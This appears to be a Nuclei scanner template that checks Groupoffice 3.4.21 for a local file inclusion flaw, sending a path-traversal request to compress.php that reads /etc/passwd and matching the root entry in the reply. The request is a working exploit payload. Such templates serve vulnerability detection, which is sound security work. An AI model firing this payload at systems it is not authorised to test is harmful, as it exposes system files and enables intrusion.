id: groupoffice-lfi

info:
  name: Groupoffice 3.4.21 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Groupoffice 3.4.21 is vulnerable to local file inclusion.
  reference:
    - https://cxsecurity.com/issue/WLB-2018020249
    - http://www.group-office.com
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: groupoffice,lfi,traversal

requests:
  - method: GET
    path:
      - "{{BaseURL}}/compress.php?file=../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/27
